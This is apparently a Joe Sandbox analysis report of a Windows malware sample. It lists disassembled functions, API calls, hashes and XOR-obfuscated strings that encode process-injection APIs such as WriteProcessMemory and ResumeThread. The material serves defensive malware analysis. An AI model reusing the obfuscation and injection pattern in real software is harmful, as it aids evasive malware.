                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                                                  • API String ID: 3245196872-1565342463
                                                                  • Opcode ID: 2e4b354c8dbaeedcc6917afc53ded3b95313a27eaa8e3af3d783511b16afa5e1
                                                                  • Instruction ID: f25b1826d3d404d435323bdc63ce11a4a697c9fd044df481343fbc9de6b959a4
                                                                  • Opcode Fuzzy Hash: 2e4b354c8dbaeedcc6917afc53ded3b95313a27eaa8e3af3d783511b16afa5e1
                                                                  • Instruction Fuzzy Hash: 77513CB1D80158AFCB25DBE8CC85AEFB7FEAF46300F050595E255E7281DB709E408BA4
                                                                  Function 006048C3 Relevance: 15.1, APIs: 10, Instructions: 101stringlibrarythreadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 302 6048c3-6048f4 lstrcpynA GetThreadLocale GetLocaleInfoA 303 6049f3-6049f9 302->303 304 6048fa-6048fe 302->304 305 604900-604904 304->305 306 60490a-604921 lstrlenA 304->306 305->303 305->306 307 604926-60492c 306->307 308 604939-604942 307->308 309 60492e-604937 307->309 308->303 311 604948-60494f 308->311 309->308 310 604923 309->310 310->307 312 604951-60497b lstrcpynA LoadLibraryExA 311->312 313 60497d-60497f 311->313 312->313 313->303 314 604981-604985 313->314 314->303 315 604987-6049bb lstrcpynA LoadLibraryExA 314->315 315->303 316 6049bd-6049f1 lstrcpynA LoadLibraryExA 315->316 316->303
                                                                  APIs
                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 006048D3
                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 006048E0
                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 006048E6
                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00604911
                                                                  • lstrcpynA.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00604966
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00604976
                                                                  • lstrcpynA.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 006049A2
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 006049B2
                                                                  • lstrcpynA.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 006049DC
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 006049EC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                  • API String ID: 1599918012-2375825460
                                                                  • Opcode ID: fbee07662e67e25edda719bac5f00b0db6dba760934fe37d0afadedae1740f6a
                                                                  • Instruction ID: 2ea8edce084a28266abf1f81c2071a4b319a879fe6d4c62b47c76c420ca39287
                                                                  • Opcode Fuzzy Hash: fbee07662e67e25edda719bac5f00b0db6dba760934fe37d0afadedae1740f6a
                                                                  • Instruction Fuzzy Hash: E13197B1E8424D7EDB69DAE8CC85FDFB7BE9B19300F0041A5A244E61C1DBB89E458B50
                                                                  Function 0040399B Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 317 40399b-4039a6 318 4039a8-4039b7 LoadLibraryA 317->318 319 4039ea-4039f1 317->319 322 403a20-403a22 318->322 323 4039b9-4039ce GetProcAddress 318->323 320 4039f3-4039f9 319->320 321 403a09-403a15 319->321 320->321 327 4039fb-403a02 320->327 324 403a1c-403a1f 321->324 322->324 323->322 325 4039d0-4039e5 GetProcAddress * 2 323->325 325->319 327->321 328 403a04-403a07 327->328 328->321
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(user32.dll), ref: 004039AD
                                                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004039C5
                                                                  • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004039D6
                                                                  • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004039E3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                  • API String ID: 2238633743-4044615076
                                                                  • Opcode ID: 56fcd12e22422f3926956bab43dc5e187367ba90ba411f881e403aaca0228d71
                                                                  • Instruction ID: a479ffe80b3d4e596aad1b70f613aa0b77e146be3452bb55d1156979b56034e0
                                                                  • Opcode Fuzzy Hash: 56fcd12e22422f3926956bab43dc5e187367ba90ba411f881e403aaca0228d71
                                                                  • Instruction Fuzzy Hash: E20175317003029BC710EFF56D80D1B7EECD649792315443FA542F22A1D6B8C811AF6D
                                                                  Function 00609014 Relevance: 30.1, APIs: 2, Strings: 15, Instructions: 328libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(00000000), ref: 00609061
                                                                  • LoadLibraryA.KERNEL32(00000000), ref: 00609089
                                                                    • Part of subcall function 00608D40: lstrcmpA.KERNEL32(?,?), ref: 00608D95
                                                                    • Part of subcall function 00604F9C: CreateWindowExA.USER32 ref: 00604FD9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad$CreateWindowlstrcmp
                                                                  • String ID: @qfbwfSql`fppB$D$DfwWkqfbg@lmwf{w$Hfqmfo01$MWGOO$MZ$PE$PfwWkqfbg@lmwf{w$QfbgSql`fppNfnlqz$QfpvnfWkqfbg$TqjwfSql`fppNfnlqz$UjqwvboBool`F{$UjqwvboSqlwf`wF{$first Window app$oloooool
                                                                  • API String ID: 2125446073-2128899875
                                                                  • Opcode ID: d87c723a2cb561c1242fafc6be16d314feaded0c2aac151016e52f6c516e272c
                                                                  • Instruction ID: 715b9aa7201df64e9751e330e1e9c19a6bf475734f272f1f24890eb41cefc1f1
                                                                  • Opcode Fuzzy Hash: d87c723a2cb561c1242fafc6be16d314feaded0c2aac151016e52f6c516e272c
                                                                  • Instruction Fuzzy Hash: 2BC10B71A402189FDB54EBA8CC85BDFB7BAEF48300F5040A9F649E72C1DA749E458F64
                                                                  Function 00403B2E Relevance: 13.7, APIs: 9, Instructions: 177COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LCMapStringW.KERNEL32(00000000,00000100,00405414,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00403B70
                                                                  • LCMapStringA.KERNEL32(00000000,00000100,00405410,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00403B8C
                                                                  • LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00403BD5
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00403C0D
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000020,00000001,00000100,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00403C65
                                                                  • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00403C7B
                                                                  • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00403CAE
                                                                  • LCMapStringW.KERNEL32(?,00000100,00000100,00000100,?,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00403D16
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: String$ByteCharMultiWide
                                                                  • String ID:
                                                                  • API String ID: 352835431-0
                                                                  • Opcode ID: 9b1fb0eaeae7abdf1945f3128f7ae684e41b35706a3eb2943a3cdfd2cbdd8426
                                                                  • Instruction ID: 1c21f9441693a9a0395c5586c8818974786ee025f7665dbb4546bf95d124890a
                                                                  • Opcode Fuzzy Hash: 9b1fb0eaeae7abdf1945f3128f7ae684e41b35706a3eb2943a3cdfd2cbdd8426
                                                                  • Instruction Fuzzy Hash: 8D519C72900209ABDF219F94CD45ADF7FB8FB88755F10412AF910B12A0C3399E61DBA9
                                                                  Function 00607EE4 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(00000000,006081AF,?,?,00000000,00000000), ref: 00607F1A
                                                                    • Part of subcall function 00606ADC: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00606AFA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Locale$InfoThread
                                                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                  • API String ID: 4232894706-2493093252
                                                                  • Opcode ID: 405970b93d369cb88c6105069f13510f53fd476ac40e868c890e2f5029489c8f
                                                                  • Instruction ID: f84dacb58a5ec69ebe353e46d4ea67f2db6b91476feb507f417b75987f752d9b
                                                                  • Opcode Fuzzy Hash: 405970b93d369cb88c6105069f13510f53fd476ac40e868c890e2f5029489c8f
                                                                  • Instruction Fuzzy Hash: A46160307802499FDB48FBA4DC4169F7BABDF89300F50A478B542AB3C6CA35DE168718
                                                                  Function 00609624 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 122libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(00000000), ref: 00609674
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID: EjmgQfplvq`fB$EqffQfplvq`f$Hfqmfo01$Ol`hQfplvq`f$OlbgQfplvq`f$PjyfleQfplvq`f
                                                                  • API String ID: 1029625771-1297955608
                                                                  • Opcode ID: 50a1be8785d472289030787bf25c4f1d7d0ebf42d9f267e51da72cc4393963f9
                                                                  • Instruction ID: 39f62e41613c841c82e5d73a37b016aa8bff7db7b0af8e5ffb24b86a5f561013
                                                                  • Opcode Fuzzy Hash: 50a1be8785d472289030787bf25c4f1d7d0ebf42d9f267e51da72cc4393963f9
                                                                  • Instruction Fuzzy Hash: CB41ED31B902185FDB88EBA4C851ADFB6BEEF48340F504439F541A73C2EA749E018BA4
                                                                  Function 00402511 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 0040257E
                                                                  • GetStdHandle.KERNEL32(000000F4,00405348,00000000,?,00000000,?), ref: 00402654
                                                                  • WriteFile.KERNEL32(00000000), ref: 0040265B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: File$HandleModuleNameWrite
                                                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                  • API String ID: 3784150691-4022980321
                                                                  • Opcode ID: 0c2281f3aa94957885efe1dd98b9d45b276729d5152b46fa3ea8c28481f0212a
                                                                  • Instruction ID: dc953bc63a9f778bc1b12ee88897f7fe90698b9d6db9149e529bfef901ecca1e
                                                                  • Opcode Fuzzy Hash: 0c2281f3aa94957885efe1dd98b9d45b276729d5152b46fa3ea8c28481f0212a
                                                                  • Instruction Fuzzy Hash: DB3185726002186EDF20EA60CE49F9B776CEF45304F50047BF945F61C1D6B8AA948E59
                                                                  Function 00603868 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00603932,?,?,?,?,00000002,006039DE,0060292B,00602973,00000000), ref: 006038A1
                                                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 006038A7
                                                                  • GetStdHandle.KERNEL32(000000F5,006038F0,00000002,?,00000000,00000000,?,00603932,?,?,?,?,00000002,006039DE,0060292B,00602973), ref: 006038BC
                                                                  • WriteFile.KERNEL32(00000000,000000F5,006038F0,00000002,?), ref: 006038C2
                                                                  • MessageBoxA.USER32 ref: 006038E0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FileHandleWrite$Message
                                                                  • String ID: Error$Runtime error at 00000000
                                                                  • API String ID: 1570097196-2970929446
                                                                  • Opcode ID: 0de637ff2df70bf3d24f60879d7482bd274cc52ed5bac0e5d9a1a20b0b58f315
                                                                  • Instruction ID: 2124d88e66a0689c667f87b3bfccbc2f9e17d8888c3032dd70b9ee23f7f0035c
                                                                  • Opcode Fuzzy Hash: 0de637ff2df70bf3d24f60879d7482bd274cc52ed5bac0e5d9a1a20b0b58f315
                                                                  • Instruction Fuzzy Hash: 22F0B470AC439878E7386BA09D0BFAF234F9741F19F14E659B3519C2D1DBA44AC49226
                                                                  Function 00401F0D Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0040185C), ref: 00401F28
                                                                  • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0040185C), ref: 00401F3C
                                                                  • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0040185C), ref: 00401F68
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0040185C), ref: 00401FA0
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0040185C), ref: 00401FC2
                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,0040185C), ref: 00401FDB
                                                                  • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0040185C), ref: 00401FEE
                                                                  • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040202C
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                  • String ID:
                                                                  • API String ID: 1823725401-0
                                                                  • Opcode ID: 6cc6b04491aafc98d39791db8cca144a75cc353a196cdcde92c063c0bf283cdb
                                                                  • Instruction ID: 3866f0483314f29f1618ff4dfa568d2e56ff3937cd63a0f44ec9b139913bb891
                                                                  • Opcode Fuzzy Hash: 6cc6b04491aafc98d39791db8cca144a75cc353a196cdcde92c063c0bf283cdb
                                                                  • Instruction Fuzzy Hash: 2931E5B25043126FE7203F755DC883F769CE645358B11053BFA42F32D0EAB94C4186AD
                                                                  Function 00607048 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00607064
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00607088
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 006070A3
                                                                  • LoadStringA.USER32 ref: 00607147
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                  • String ID: 8S`$P`
                                                                  • API String ID: 3990497365-1792595465
                                                                  • Opcode ID: 89b3f9bb937295af7cd429966be731153e1d714cef756d376cb3c10833ea981d
                                                                  • Instruction ID: c8a1f16859b4dcf090157e96d894a6f6421ab70c159423d212d38e17420c788a
                                                                  • Opcode Fuzzy Hash: 89b3f9bb937295af7cd429966be731153e1d714cef756d376cb3c10833ea981d
                                                                  • Instruction Fuzzy Hash: E6410CB0A4425C9FDB69DB58CC85BDFB7BAAB44300F0440E9A608E7291D774AF848F55
                                                                  Function 00607046 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 107COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00607064
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00607088
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 006070A3
                                                                  • LoadStringA.USER32 ref: 00607147
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                  • String ID: 8S`$P`
                                                                  • API String ID: 3990497365-1792595465
                                                                  • Opcode ID: f9160e2e3aea943f337618f753a94f9a5b8617bef0c3aad1d4f9833616218498
                                                                  • Instruction ID: 65422663e8b175293843514dc2e6730b18d16fd9701fe0644df9e792c6c37fbb
                                                                  • Opcode Fuzzy Hash: f9160e2e3aea943f337618f753a94f9a5b8617bef0c3aad1d4f9833616218498
                                                                  • Instruction Fuzzy Hash: 9D412E70A8425C9FDB69DB58CC85BDFB7FAAB04300F0440E9A608E7291D774AF848F55
                                                                  Function 006071E0 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00607048: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00607064
                                                                    • Part of subcall function 00607048: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00607088
                                                                    • Part of subcall function 00607048: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 006070A3
                                                                    • Part of subcall function 00607048: LoadStringA.USER32 ref: 00607147
                                                                  • CharToOemA.USER32 ref: 00607217
                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 00607234
                                                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0060723A
                                                                  • GetStdHandle.KERNEL32(000000F4,006072A4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0060724F
                                                                  • WriteFile.KERNEL32(00000000,000000F4,006072A4,00000002,?), ref: 00607255
                                                                  • LoadStringA.USER32 ref: 00607277
                                                                  • MessageBoxA.USER32 ref: 0060728D
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                  • String ID:
                                                                  • API String ID: 185507032-0
                                                                  • Opcode ID: 6972115aa8794e35d0410798ef050c4773f5b9befd8970058d6dddba8381a8a3
                                                                  • Instruction ID: eb9fee9d3dd4f480ad86a08fe3e3c715f1e52eb9def34b6db25ae0c784218af9
                                                                  • Opcode Fuzzy Hash: 6972115aa8794e35d0410798ef050c4773f5b9befd8970058d6dddba8381a8a3
                                                                  • Instruction Fuzzy Hash: 0B114CB15883466ED358F7A4CC46F9B77EEAB84300F404519B354D60E2DF74E9048B2A
                                                                  Function 00403D7D Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetStringTypeW.KERNEL32(00000001,00405414,00000001,00000000,?,00000100,00000000,00402A37,00000001,00000020,00000100,?,00000000), ref: 00403DBC
                                                                  • GetStringTypeA.KERNEL32(00000000,00000001,00405410,00000001,00000000,?,00000100,00000000,00402A37,00000001,00000020,00000100,?,00000000), ref: 00403DD6
                                                                  • GetStringTypeA.KERNEL32(00000000,?,00000100,00000020,00000001,?,00000100,00000000,00402A37,00000001,00000020,00000100,?,00000000), ref: 00403E0A
                                                                  • MultiByteToWideChar.KERNEL32(00402A37,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,00402A37,00000001,00000020,00000100,?,00000000), ref: 00403E42
                                                                  • MultiByteToWideChar.KERNEL32(00402A37,00000001,00000100,00000020,?,00000100,?,00000100,00000000,00402A37,00000001,00000020,00000100,?), ref: 00403E98
                                                                  • GetStringTypeW.KERNEL32(?,?,00000000,00000001,?,00000100,?,00000100,00000000,00402A37,00000001,00000020,00000100,?), ref: 00403EAA
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: StringType$ByteCharMultiWide
                                                                  • String ID:
                                                                  • API String ID: 3852931651-0
                                                                  • Opcode ID: 07bb9862341e01356d0dff1c427b7db7969236951c1baf01262c24fa338bcbd1
                                                                  • Instruction ID: 0f8efcfe3fc3890c713297aeb0959f0275bfe311c219aa286c24befefaedaadf
